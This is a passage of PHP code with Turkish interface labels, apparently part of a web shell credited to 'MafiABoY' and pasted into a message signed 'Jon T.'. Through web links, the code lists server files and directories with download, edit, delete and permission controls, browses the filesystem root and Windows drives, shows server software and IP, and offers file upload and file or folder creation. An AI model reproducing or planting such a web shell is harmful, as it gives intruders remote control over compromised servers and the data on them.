echo \"<div align=right><font face=\'arial\' size=\'2\' color=\'#C0C0C0\'><b> $file</b></font> - <a href=\'./$this_file?save=$path/$file&fname=$file\'>indir</a> - <a href=\'./$this_file?op=edit&fname=$path/$file&dir=$path\'>düzenle</a> - \";
echo \"<a href=\'./$this_file?op=del&fname=$path/$file&dir=$path\'>sil</a> - <b>$total_kb$total_kb2</b> - \";
@$fileperm=substr(base_convert(fileperms(\"$path/$file\"),10,8),-4);
echo \"<a href=\'./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path\'><font color=\'#FFFF00\'>$fileperm</font></a>\";
echo \"<br></div>\\n\";
}else{
echo \"<div align=left><a href=\'./$this_file?dir=$path/$file\'>GİT></a> <font face=\'arial\' size=\'3\' color=\'#808080\'> $path/$file</font> - <b>DIR</b> - <a href=\'./$this_file?op=dd&yol=$path/$file&here=$path\'>Sil</a> - \";
$dirperm=substr(base_convert(fileperms(\"$path/$file\"),10,8),-4);
echo \"<font color=\'#FFFF00\'>$dirperm</font>\";
echo \" <br></div>\\n\";
}
}
}
closedir($dir);
}
}
echo \"<center>------------------------------</center>\";
echo \"<center><a href=\'./$this_file?dir=$DOCUMENT_ROOT\'>Root Klasörüne Git</a></center>\";
echo \"<center><a href=\'./$this_file?dir=/\'>Linux Kök Dizinine Git</a></center>\";
if(file_exists(\"B:\\\\\")){
echo \"<center><a href=\'./$this_file?dir=B:\\\\\'>B:\\\\</a></center>\";
} else {}
if(file_exists(\"C:\\\\\")){
echo \"<center><a href=\'./$this_file?dir=C:\\\\\'>C:\\\\</a></center>\";
} else {}
if (file_exists(\"D:\\\\\")){
echo \"<center><a href=\'./$this_file?dir=D:\\\\\'>D:\\\\</a></center>\";
} else {}
if (file_exists(\"E:\\\\\")){
echo \"<center><a href=\'./$this_file?dir=E:\\\\\'>E:\\\\</a></center>\";
} else {}
if (file_exists(\"F:\\\\\")){
echo \"<center><a href=\'./$this_file?dir=F:\\\\\'>F:\\\\</a></center>\";
} else {}
if (file_exists(\"G:\\\\\")){
echo \"<center><a href=\'./$this_file?dir=G:\\\\\'>G:\\\\</a></center>\";
} else {}
if (file_exists(\"H:\\\\\")){
echo \"<center><a href=\'./$this_file?dir=H:\\\\\'>H:\\\\</a></center>\";
} else {}
echo \"--------------------------------------------------------------------------------------------------------------------------------------------------------------------\";
echo \"<center><font size=\'+1\' color=\'#FF0000\'><b>SERVER BİLGİLERİ</b></font><br></center>\";
echo \"<br><u><b>$SERVER_SIGNATURE</b></u>\";
echo \"<b><u>Software</u>: $SERVER_SOFTWARE</b><br>\";
echo \"<b><u>Server IP</u>: $SERVER_ADDR</b><br>\";
echo \"<br>\";
echo \"--------------------------------------------------------------------------------------------------------------------------------------------------------------------\";
echo \"<center><font size=\'+1\' color=\'#FF0000\'><b>İŞLEMLER</b></font><br></center>\";
echo \"<br><center><font size=\'4\'><a href=\'$this_file?op=up&dir=$path\'>Dosya Gönder</a></font></center>\";
echo \"<br><center><font size=\'4\'><a href=\'$this_file?op=mf&dir=$path\'>Dosya Oluştur</a></font></center>\";
echo \"<br><center><font size=\'4\'><a href=\'$this_file?op=md&dir=$path\'>Klasör Oluştur</a></font></center>\";
echo \"--------------------------------------------------------------------------------------------------------------------------------------------------------------------\";
echo \"<br>
<center>Tüm hakları sahibi MafiABoY\'a aittir</center>\";
?>Regards,
Jon T.